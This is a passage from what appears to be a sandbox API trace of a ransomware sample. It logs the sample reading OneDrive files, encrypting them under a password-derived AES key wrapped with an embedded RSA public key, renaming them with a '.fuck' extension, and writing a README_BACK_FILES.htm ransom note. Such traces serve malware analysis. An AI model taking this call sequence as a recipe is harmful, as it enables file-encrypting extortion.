nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.471] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.471] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.471] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.471] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.471] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.471] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.471] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.471] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.471] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.471] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.471] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.472] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.472] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.472] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.472] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.472] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.472] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.472] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.472] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.472] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.472] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.472] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.472] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.472] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.473] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.473] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.473] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.473] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.473] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.473] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.473] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.473] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.473] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x1c8, lpOverlapped=0x0) returned 1 [0287.473] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x1c8, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x1d0) returned 1 [0287.473] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x1d0, lpOverlapped=0x0) returned 1 [0287.473] CloseHandle (hObject=0x5d3c) returned 1 [0287.473] CloseHandle (hObject=0x5d4c) returned 1 [0287.474] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa-arab\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa-arab\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa-arab\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa-arab\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0287.480] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa-arab\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0287.480] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa-arab\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa-arab\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0287.482] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa-arab\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa-arab\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa-arab\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa-arab\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0287.483] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0287.483] CryptDestroyKey (hKey=0x2fc448) returned 1 [0287.483] CryptReleaseContext (hProv=0x2f1fed8, dwFlags=0x0) returned 1 [0287.483] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0287.483] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0287.483] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa-arab\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa-arab\\readme_back_files.htm")) returned 0xffffffff [0287.484] AreFileApisANSI () returned 1 [0287.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 101 [0287.484] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pa-arab\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pa-arab\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0287.490] GetFileType (hFile=0x5d80) returned 0x1 [0287.490] WriteFile (in: hFile=0x5d80, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0287.491] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0287.491] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pl\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0287.491] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0287.491] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0287.492] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0287.492] GetLastError () returned 0x0 [0287.492] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pl\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pl\\filesync.localizedresources.dll.mui")) returned 0x20 [0287.494] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pl\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0287.494] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pl\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pl\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0287.495] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pl\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pl\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0287.496] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pl\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0287.497] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f20180) returned 1 [0287.499] CryptCreateHash (in: hProv=0x2f20180, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0287.499] lstrlenA (lpString="ZKgxkgBnwFXjXLqFNYOPgIIdzMlQm") returned 29 [0287.499] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0287.499] CryptDeriveKey (in: hProv=0x2f20180, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc388) returned 1 [0287.500] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0287.500] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0287.500] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1f7f0) returned 1 [0287.500] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1f7f0, dwCertEncodingType=0x1, pInfo=0x2f38750*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f38780*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f38788*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc608) returned 1 [0287.500] CryptEncrypt (in: hKey=0x2fc608, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0287.501] CryptEncrypt (in: hKey=0x2fc608, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1fdc8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1fdc8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0287.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f1fdc8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1fdc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0287.502] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.503] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.504] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.626] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.627] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.627] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.627] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.627] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.627] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.627] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.627] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.627] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.627] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.627] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.627] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.628] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.628] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.628] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.628] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.628] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.628] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.628] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.628] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.628] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.628] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.628] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.628] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, 